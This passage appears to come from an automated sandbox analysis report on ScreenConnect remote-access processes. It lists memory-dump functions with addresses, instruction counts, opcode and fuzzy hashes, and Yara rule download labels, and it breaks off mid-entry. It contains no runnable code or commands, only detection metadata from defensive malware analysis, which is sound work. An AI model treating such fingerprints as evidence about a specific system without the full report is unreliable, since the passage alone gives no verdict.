Instruction ID: 7587e599d0e56780db785cd9aba10f3c67bdd5f0ed5149f4629e4e2fb92c371f
Opcode Fuzzy Hash: ae1c8f4fa61e61fbe4ad86c9794f5b48935652ec88eb7660d4d6dc563b6a4cfe
Instruction Fuzzy Hash: 9DF090396042509FCB12E7BDE46159A3FA5DFC5950305825FE685DB355EE21A8068BC0

Function 014F1414 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35d51b81700ded04688d586350eb9f039c692c8ed2eeb3952de62d62de0cf6cc
Instruction ID: e8dddbc4ee1d2cb85d47e0215345e776784db08741e91eadda37fb6adb8c7f02
Opcode Fuzzy Hash: 35d51b81700ded04688d586350eb9f039c692c8ed2eeb3952de62d62de0cf6cc
Instruction Fuzzy Hash: E2F0247250C3918FD312D779E8212A83FA0EEE221074506DFD185CF662DAA9A909C751

Function 014F1DA1 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a6c568a6942e4b0a7edf1c22025558849a16f8d82738cce57e729d16903ed21
Instruction ID: 8e0317f3f3baac8b43f9eb5e38c4e264c8431ca220873db81c028778f7f0bc37
Opcode Fuzzy Hash: 7a6c568a6942e4b0a7edf1c22025558849a16f8d82738cce57e729d16903ed21
Instruction Fuzzy Hash: FBF0E5353043449F93156B78E49806ABFB6EFC6121314452BE64BC73D6CE759C068F61

Function 014F5F68 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f33933869238576424ce3129e4e3ff97d7fad5d625ec7ee95a61bd9b9c27a47e
Instruction ID: 58dda7c3b6ed351daa4090bf9c1821ac03c3cd9dd5254f780a3429f0c8e40d21
Opcode Fuzzy Hash: f33933869238576424ce3129e4e3ff97d7fad5d625ec7ee95a61bd9b9c27a47e
Instruction Fuzzy Hash: EDE02232B055825F97129228AD660216FE54E5512533C8AFBF128CF3A3E630CC1247A2

Function 014F8100 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3accdfa42941b01d2fad83f8b0891de66be15bc741c55e9565de253f989a98e4
Instruction ID: bd8e3bd434864490be5405601b332623041131d102993d977a416a1e41a736a8
Opcode Fuzzy Hash: 3accdfa42941b01d2fad83f8b0891de66be15bc741c55e9565de253f989a98e4
Instruction Fuzzy Hash: 06F0246104C3D14FD3438B2898941C57FF49F13120B4906DAD9C28E583D229845BCB12

Function 014F0838 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89fcac2797b5f87988d16f514d9808e23b96841025d0c86ca40fc08ebafc802d
Instruction ID: 415e58be8cdad18eac1093f21cbd7b1e8e0c218f6231329f3e13c75b0ecaea64
Opcode Fuzzy Hash: 89fcac2797b5f87988d16f514d9808e23b96841025d0c86ca40fc08ebafc802d
Instruction Fuzzy Hash: D4F0E53090D248EFCB01CFB8D8914AD3FF9EF96600B0055CED988D7312E6755A16EB91

Function 014F6EF2 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90a3f7b2f6ea10da9fcd6d79c27fdbe5da95b42440812669ce940131a61fca8b
Instruction ID: 6ca959f50c08c5e8b6f9c3c55d513a9cc9dcbbe001665bdf16423476a1715efc
Opcode Fuzzy Hash: 90a3f7b2f6ea10da9fcd6d79c27fdbe5da95b42440812669ce940131a61fca8b
Instruction Fuzzy Hash: A6E092313143106B9B141AAEB49C56F7BDAEBC9621351443EF60DC3340CE7148064B65

Function 014F12B0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dc8e4d6f1a6b3366aedc5682498c90d28c6dfb5efeb46c96c5653669b5e9639
Instruction ID: 1d695cef940a96690c55f0108f614f217ac6e3dacedfa804ada6249f7dd16dbb
Opcode Fuzzy Hash: 9dc8e4d6f1a6b3366aedc5682498c90d28c6dfb5efeb46c96c5653669b5e9639
Instruction Fuzzy Hash: A3F0A0393006109B8716ABAEE41049F3B96EBC4A50311C12EE649D7344DF71A8014BC0

Function 014F8166 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d7f7a189467f4314291f56b313486c417b1432d415b7d42d31771e5c736b4c7
Instruction ID: 529f75b96f7dd657cbd9fd023f83becfbd2dcf9ff9d4ebe43b816d6c78e90737
Opcode Fuzzy Hash: 2d7f7a189467f4314291f56b313486c417b1432d415b7d42d31771e5c736b4c7
Instruction Fuzzy Hash: 6BE08673B092556BDB68CABEA840A9BBBDECBD4220B04C07FF50DD3340E931E5018764

Function 014F6EF8 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e09c77b31683df7ac5a1e4640acfdd734d84d58e9991f9cb31d47aabd9857276
Instruction ID: a2eb3a70e2739fac46e411dc537a63427a11851c203332fd18464ec0051265f5
Opcode Fuzzy Hash: e09c77b31683df7ac5a1e4640acfdd734d84d58e9991f9cb31d47aabd9857276
Instruction Fuzzy Hash: AAE0DF313003106B87142AAEF49C52FBADAEFC8931350803EF60EC3380CE718C0647A4

Function 014F1819 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc5f7597bbe7df6e82f80d84e0f790b616550daf496e933131e7d21e988390c4
Instruction ID: 6352e405a6256f2ab6e280e9e46143b0bac4fae6371d1f4c619885ea2fc2f0a6
Opcode Fuzzy Hash: fc5f7597bbe7df6e82f80d84e0f790b616550daf496e933131e7d21e988390c4
Instruction Fuzzy Hash: 5BE09234A05250DFC7256B35D11C559BFE6FF86611B088099E94A87266CB3B9802CF41

Function 014F5F78 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6a2138d7551b2be34b0ff866c9bbf825efb53a71142040e9e407234afc34e7a
Instruction ID: d454c2ba722e7a1f09973d2aa476dd5f579560c46ae8f1085390a05b53d03150
Opcode Fuzzy Hash: b6a2138d7551b2be34b0ff866c9bbf825efb53a71142040e9e407234afc34e7a
Instruction Fuzzy Hash: A3E08632B014525B8B10815DAC65555B7C94B9927873C85BAF628CF3A1FA31DC0243A1

Function 014F1DF8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a10b0c52dc9071180297f80906d44dc03d2bcb7a93555fe7ce5ac173cc29cc85
Instruction ID: c6b1358c6312b8b7ff5a8d77d631994a6a3b63b07175b6d6524851621a6902ae
Opcode Fuzzy Hash: a10b0c52dc9071180297f80906d44dc03d2bcb7a93555fe7ce5ac173cc29cc85
Instruction Fuzzy Hash: C0E0D8B591A249DFCB41DB74EE861AC7F70DF4210471056EAD44DD7202DA305E149F41

Function 014F1DB0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82adb66c54123d3a32f873a7f69c7c097a0655556950e7723055e3199c19b512
Instruction ID: ffc663c91f3f26704a039fc0d38b4b149beae52493beadbd2c6e9cd88c5facb6
Opcode Fuzzy Hash: 82adb66c54123d3a32f873a7f69c7c097a0655556950e7723055e3199c19b512
Instruction Fuzzy Hash: BDE086397101149B4314677DF45C49EBBAAEFC91723108136F50BC3384CF759C028BA0

Function 014F1310 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aab2407ab07a06f14206c463144acd82f7b701752143f9f2463ca649997451ce
Instruction ID: 1dfe9a235a55a175d75726d78d6373e9455ce1504ef6c2d8cce6583708b6deb2
Opcode Fuzzy Hash: aab2407ab07a06f14206c463144acd82f7b701752143f9f2463ca649997451ce
Instruction Fuzzy Hash: CFE0EC70D54109AF8B80DFBC8A4516EBBF4EB08644B1086AA981EE3255E63296138BD6

Function 014F13D1 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b34814f7a91310aca2de85af57a1584ff5e8d8ac81943da99765afbb071640f2
Instruction ID: 6e210b7849b945b39c2c3fb5048a901967255e9719cd5c9fde9f61ccef4c9c17
Opcode Fuzzy Hash: b34814f7a91310aca2de85af57a1584ff5e8d8ac81943da99765afbb071640f2
Instruction Fuzzy Hash: B6E0DF3160C3528FC316E729F4103D87BE1BFC1210B050AAED1848B156CAA0790887A1

Function 014F7FB8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f8aa11509421efa14b7f8d1ce6f958918483bd5968e814c4d49af5d2d475d2f
Instruction ID: dfc8ff55759e567b47a319bcd0189d02dce20a1bea3719742c071235f99fa5d7
Opcode Fuzzy Hash: 8f8aa11509421efa14b7f8d1ce6f958918483bd5968e814c4d49af5d2d475d2f
Instruction Fuzzy Hash: 0EE0DF2005D3D41FD3038728A89A2D17FE4CF07224F0808D9E5C58A583D126685BCBA2

Function 014F8158 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4a4fdb1e51ba1b25612ebdbe3bd08ceb44665d4cf0b6b7e45bf01dff394be6d
Instruction ID: 56a28b00d0f3f288e43be99dbb4559a648e78e6d39ec0b7f9e6d611e7dcf0b8d
Opcode Fuzzy Hash: f4a4fdb1e51ba1b25612ebdbe3bd08ceb44665d4cf0b6b7e45bf01dff394be6d
Instruction Fuzzy Hash: 52E0E27440C3819FD742DF24E550158BFF0AA46610F09899EE8CCC7252E339A95ADF92

Function 014F0848 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e1af2f13d61d99cf17397ac33890a48c549d67d85e8f5c36bd8504f057ace64
Instruction ID: e952b4e8239be1ae726d330907d292f3e317272b26279c77022acd26c7a35fff
Opcode Fuzzy Hash: 1e1af2f13d61d99cf17397ac33890a48c549d67d85e8f5c36bd8504f057ace64
Instruction Fuzzy Hash: 21D05E30A1120DFFCB00EFB8E94059DBBF9FB84200B5082ADD848E7200EA312F009B84

Function 014F1E08 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f981a9f6101df5dba7e4d7ba8956dc12e2fd0b6ed9256db488ca62be961aa24
Instruction ID: e52ce3f276192bb4406be65a015e06165d89b123ae3e114d9186d32de6c7b97c
Opcode Fuzzy Hash: 3f981a9f6101df5dba7e4d7ba8956dc12e2fd0b6ed9256db488ca62be961aa24
Instruction Fuzzy Hash: 42D0127491110DEF8B40DFB4F98559DBBB5EF44610B5081A9D509D7201EA716E009B40

Analysis Process: ScreenConnect.ClientService.exePID: 5728, Parent PID: 632COMMON

Executed Functions

Function 019FFB40 Relevance: 1.6, Strings: 1, Instructions: 315COMMON

Download Yara Rule

Strings

d, xrefs: 019FFB83

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 36cd7b656a2267e6ce168a8ccaa94fec6911a144d0760b79c31549d481bbfb2a
Instruction ID: 32cf1120bddfcb0392b90b6bc54327b59037610e95ee14cf282fb05acecc7323
Opcode Fuzzy Hash: 36cd7b656a2267e6ce168a8ccaa94fec6911a144d0760b79c31549d481bbfb2a
Instruction Fuzzy Hash: 68D15175A00705DFCB04DF68D884A99B7B6FF89311B118699E909AB365DB30FC85CF90

Function 019F6FE8 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

(, xrefs: 019F70FE

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-1334834377
Opcode ID: 76278a6daf124084e81c13db42a54f49b41fe3df2b286a2c57de3841d691e17f
Instruction ID: 66c49726379974f98b0137c0647ba80b19254525719f6cb0953cdd398fa2032f
Opcode Fuzzy Hash: 76278a6daf124084e81c13db42a54f49b41fe3df2b286a2c57de3841d691e17f
Instruction Fuzzy Hash: D931E375B00302AB9B15ABBC984156E7BEAFFC5211304862DD619EB346EE70ED058BE0

Function 019F6FF8 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

(, xrefs: 019F70FE

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-1334834377
Opcode ID: f8e4bdf7ae76b3c1bcab29498e409b1490fc342b87e880e539b59057e1b0ba0d
Instruction ID: 4fa3cbf8da34c281406e22dc222434502023acdbfad76b65b220a1f2c6aae896
Opcode Fuzzy Hash: f8e4bdf7ae76b3c1bcab29498e409b1490fc342b87e880e539b59057e1b0ba0d
Instruction Fuzzy Hash: 1C31D235B002129B9B15EBBC984156EBBEAFFC8211300852DD619EB345EF74ED058BE0

Function 064C0948 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3406403739.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_64c0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: becae5ce7b664ca75514880b0eef4aea28d836dbb4bcca97a253596105670964
Instruction ID: 378afcc0d8295af11fd82e70254db91ad6e4dfa0b4c6392b41e7ea3671497971
Opcode Fuzzy Hash: becae5ce7b664ca75514880b0eef4aea28d836dbb4bcca97a253596105670964
Instruction Fuzzy Hash: 16025835A10719CFCB55DF68C840A9AB7B2FF89310F10869AD549AB311EB71EE85CF81

Function 019FC67F Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 941da637317fb127cae0ff1a43a71ed13475b130f40e9a73efbdaca6726e9bbb
Instruction ID: 724e60bc29c044629be3ae1984e4d8cf4f7d81b1486016332eadcfc5490b045e
Opcode Fuzzy Hash: 941da637317fb127cae0ff1a43a71ed13475b130f40e9a73efbdaca6726e9bbb
Instruction Fuzzy Hash: 6CB1A230A00349EFDB15EFA8C854AADBBB5FF85300F10C55ED649AB366DB74A945CB80

Function 019FD078 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99c9a8e0cc1472142bd2d8922c14c22953ac980aeb8984ff06ad40506395f7ec
Instruction ID: ec9a5a616dc682b76cadcf562654fca42c24d17de016e5c2c3a863f2e4bf6acf
Opcode Fuzzy Hash: 99c9a8e0cc1472142bd2d8922c14c22953ac980aeb8984ff06ad40506395f7ec
Instruction Fuzzy Hash: C7A1F774B00205DFDB14DBA8C994A9DBBF6FF89304B148569E609AB365DB71EC01CB90

Function 019FD069 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccffe91817d6e6913618115cbc35e660f06f4d4cb4d046e729388021df3cae86
Instruction ID: 02b5c90d8753a80f07a6db7244f1c365024b397aab20fce8d7ec51d006741ce2
Opcode Fuzzy Hash: ccffe91817d6e6913618115cbc35e660f06f4d4cb4d046e729388021df3cae86
Instruction Fuzzy Hash: D9A10674B00205DFDB14DBA8C994A9DBBF6FF89304B1485A9E609EB365DB71EC01CB50

Function 019FEF78 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6747ee88f5dae6e8dc34e519fc60b4683996efa67a7aef693f7692ba56abd8ba
Instruction ID: 4f1629d7ff988cfd12e7c9f94b99627ff3f903211d8ec03e3c882d5ea86fdffb
Opcode Fuzzy Hash: 6747ee88f5dae6e8dc34e519fc60b4683996efa67a7aef693f7692ba56abd8ba
Instruction Fuzzy Hash: 2A618031F002159BEB19EBB9C8506AEBBE6AFC8700F24852DD506BB384DF34AD45C795

Function 019F8D98 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5307b8189e4baedd5850aa22938c7476a2f78c12f2c6e1c145792a35d7665dc
Instruction ID: c60297f07017eb9e411c8843c9b9693188c137f13c5df3b0ce75548837091e0f
Opcode Fuzzy Hash: c5307b8189e4baedd5850aa22938c7476a2f78c12f2c6e1c145792a35d7665dc
Instruction Fuzzy Hash: C761F434B102159FDB14DF69D8949AEB7B6FF89315B1080A8E60AAB365DB30EC01DB80

Function 019F5DC0 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60d95b0415e1aea017ac4f41b9c3b01d31305e790d5556116b70442089f25f60
Instruction ID: 338b47a980c13fc177f981c9184ca8eab91b5ed2bc75f9f4fa3d3b77bde2e3bf
Opcode Fuzzy Hash: 60d95b0415e1aea017ac4f41b9c3b01d31305e790d5556116b70442089f25f60
Instruction Fuzzy Hash: A651E830705206DFE716EB38C85466E7BE6AFC5201B1584ADD609CB366EF74DC06CB91

Function 019FE308 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1e35704e58610dc0ebd94eaed10251e271aacbe50a7980fb2175a02ad892a08
Instruction ID: 10816bc5526ed0723420a47aea5fccce1f5b050b81a93bb2c72c64b863560017
Opcode Fuzzy Hash: f1e35704e58610dc0ebd94eaed10251e271aacbe50a7980fb2175a02ad892a08
Instruction Fuzzy Hash: E9517C347002029FDB14DF7CC89496ABBE6EF99304B15856DE64ADB362EB70EC05CB91

Function 019FE318 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1821d9d99b10aca43fe993e6edd532be20599d86c9bc55b25c973b179a8f70ff
Instruction ID: 0d818b03c3986bc10b33d0a3ae9e267585d6a9f616ff876f936574ef41db7887
Opcode Fuzzy Hash: 1821d9d99b10aca43fe993e6edd532be20599d86c9bc55b25c973b179a8f70ff
Instruction Fuzzy Hash: A2515934700206DFDB14EF6CC88496ABBEAEFC8304715856DE60ADB365EB70EC018B91

Function 019F5DF0 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0382bb76ec5c85da4b562c683d002cf6be87ca5cf740cea80ad15f7bd3d9303d
Instruction ID: 7c7f309b762b8d1f99298e8a8309cb6eb19e73b549e3b8eb32faed42fd7cad62
Opcode Fuzzy Hash: 0382bb76ec5c85da4b562c683d002cf6be87ca5cf740cea80ad15f7bd3d9303d
Instruction Fuzzy Hash: 2551A1307002069FEB14EB39D894A6E7BE6EF88211B15846DE60ADB355EF74ED01CB91

Function 019FC6F1 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cfb43436de0583874a0d155056bb241e8fadf638099a327722fb835ae09116c
Instruction ID: daa98b225d647a929a5ab894c5089aea53fb77b9738ed2390fc59951026c4095
Opcode Fuzzy Hash: 1cfb43436de0583874a0d155056bb241e8fadf638099a327722fb835ae09116c
Instruction Fuzzy Hash: 3D515C30A00319DFDB15EFA8C454AADBBB6FF84300F11C96DD50AAB265EB74E985CB40

Function 019F5DE0 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad922fb51277967e78cdc0b32de2f56a4c49671a996470f48aafc30cb1fa5ec3
Instruction ID: c9a05408d87355526b67879182cb5d696e638c054c030662477800e7f4681090
Opcode Fuzzy Hash: ad922fb51277967e78cdc0b32de2f56a4c49671a996470f48aafc30cb1fa5ec3
Instruction Fuzzy Hash: 6551C2707002069FEB15EB39C854A6E7BE6EFC8211B15846CE60ADB365EF74ED01CB91

Function 019F84A0 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79008a03e43c0e0158f3a663d1ef427841e244dc34034b947ddfaecc07094a2f
Instruction ID: f83f8291d7994cbad1a0cbbdbcee0082c5320319d0327f87978f0913993d73ce
Opcode Fuzzy Hash: 79008a03e43c0e0158f3a663d1ef427841e244dc34034b947ddfaecc07094a2f
Instruction Fuzzy Hash: D851F730600A01CFD724CF29D988966BBF6FF8D325B245A6CD59A9B7A4DB31E805CB40

Function 019FB2D0 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f4e5285189b8f16ada2c1583024d2a2ba928b56b15efae83211d1c19964f295
Instruction ID: 18a7951199feb83d2d86b3fd3da1cb18e3c207b7bc0e250b88fcab5f82450f4d
Opcode Fuzzy Hash: 0f4e5285189b8f16ada2c1583024d2a2ba928b56b15efae83211d1c19964f295
Instruction Fuzzy Hash: B7518D34E00209DFDB00EFB8D854B9DBBB6FF88300F509659E204AB295DB78A885CF50

Function 019FB2C0 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
